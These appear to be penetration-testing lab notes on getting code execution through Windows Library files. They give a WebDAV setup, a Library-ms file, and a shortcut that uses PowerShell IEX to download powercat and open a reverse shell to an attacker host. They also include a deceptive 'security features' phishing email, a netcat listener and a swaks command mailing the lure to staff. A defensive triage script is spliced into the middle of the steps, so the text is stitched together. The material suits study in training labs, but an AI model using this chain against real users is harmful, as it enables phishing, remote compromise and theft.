Code execution via Windows Library files
Enable a WebDAV share
- mkdir /home/kali/webdav
- cd ~/webdav
- python -m venv .venv
- source .venv/bin/activate
- python -m pip install -U pip
- python -m pip install wsgidav cheroot lxml
- wsgidav --host=0.0.0.0 --port=80 --auth=anonymous -r /home/kali/webdav/
Create two files on Windows
- Open the Windows machine
- Open VS Code
- Create a new file named config.Library-ms with this content:
  <?xml version="1.0" encoding="UTF-8"?>
  <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
    <name>@windows.storage.dll,-34582</name>
    <version>6</version>
    <isLibraryPinned>true</isLibraryPinned>
    <iconReference>imageres.dll,-1003</iconReference>
    <templateInfo>
      <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
    </templateInfo>
    <searchConnectorDescriptionList>
      <searchConnectorDescription>
        <isDefaultSaveLocation>true</isDefaultSaveLocation>
        <isSupported>false</isSupported>
        <simpleLocation>
          <url>http://192.168.119.2</url>
        </simpleLocation>
      </searchConnectorDescription>
    </searchConnectorDescriptionList>
  </libraryDescription>
- Save it on the desktop
- Create a shortcut file named install
- Right-click on the desktop, New > Shortcut
- Enter this command as the item's location:
- powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1');powercat -c 192.168.119.3 -p 4444 -e powershell"
- Transfer both files to the WebDAV directory
In the WebDAV directory
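From the defender's side, the interesting property of a .Library-ms file is that it can declare a remote simpleLocation (a WebDAV server) that Explorer will browse as if it were a local folder. The following is an added example, not part of the original notes: a small Python triage script that parses a Library-ms document, extracts every simpleLocation URL, and flags the file as suspicious when any location is remote (http/https/UNC) rather than a local path. The sample document is constructed from the XML shown above; the function names and the remote-scheme list are my own choices.

```python
"""Triage Windows .Library-ms files: flag search connectors that point at a
remote location instead of a local folder.

Added defensive example (not part of the original notes). The sample document
below is constructed from the config.Library-ms content shown on the page.
"""
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List
from urllib.parse import urlparse

# Default namespace used by Library-ms documents (as in the file above).
NS = "{http://schemas.microsoft.com/windows/2009/library}"

# Constructed sample: same structure as the page's config.Library-ms, including
# the newline inside <url> that a sloppy editor may leave behind.
SAMPLE_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>
http://192.168.119.2</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Schemes that make Explorer reach out over the network when the library opens.
REMOTE_SCHEMES = {"http", "https", "ftp", "webdav", "davs"}


def library_locations(xml_text: str) -> List[str]:
    """Return every <simpleLocation><url> value in a Library-ms document."""
    # Encode to bytes so the XML encoding declaration is honoured by the parser.
    root = ET.fromstring(xml_text.encode("utf-8"))
    urls = []
    for loc in root.iter(f"{NS}simpleLocation"):
        url_el = loc.find(f"{NS}url")
        if url_el is not None and url_el.text:
            urls.append(url_el.text.strip())
    return urls


def is_remote_location(url: str) -> bool:
    """True when the location is served over the network rather than a local path."""
    if url.startswith("\\\\"):  # UNC path such as \\host\share
        return True
    parsed = urlparse(url)
    scheme = parsed.scheme.lower()
    if scheme == "file":
        # file://host/share is remote; file:///C:/... and file://localhost are not
        return parsed.netloc not in ("", "localhost")
    # A drive letter ("C:\...") parses as a one-letter scheme and is local.
    return scheme in REMOTE_SCHEMES


def triage_library_file(xml_text: str) -> Dict[str, object]:
    """Summarise a Library-ms document for an analyst."""
    locations = library_locations(xml_text)
    remote = [u for u in locations if is_remote_location(u)]
    return {
        "locations": locations,
        "remote_locations": remote,
        "suspicious": bool(remote),
    }


if __name__ == "__main__":
    # Usage: python triage_library_ms.py [file.Library-ms ...]
    # With no arguments the constructed sample is analysed.
    inputs = sys.argv[1:] or ["<constructed sample>"]
    for name in inputs:
        text = SAMPLE_LIBRARY_MS if name.startswith("<") else open(name, encoding="utf-8").read()
        result = triage_library_file(text)
        verdict = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{name}: {verdict}; locations={result['locations']}")
```

Run it over a mail attachment or a user's Desktop folder; a library whose only location is a non-local URL has no business being sent by e-mail, and that is the signal to alert on.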
- nano body.txt, with this content:
  Hey!
  I checked mail and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.
  On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks!
  John
- cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
- Also copy the two files created on Windows into this directory
- python3 -m http.server 8000
- nc -nvlp 4444 (the listener port must match the -p 4444 used in the shortcut)
Now send the email
sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap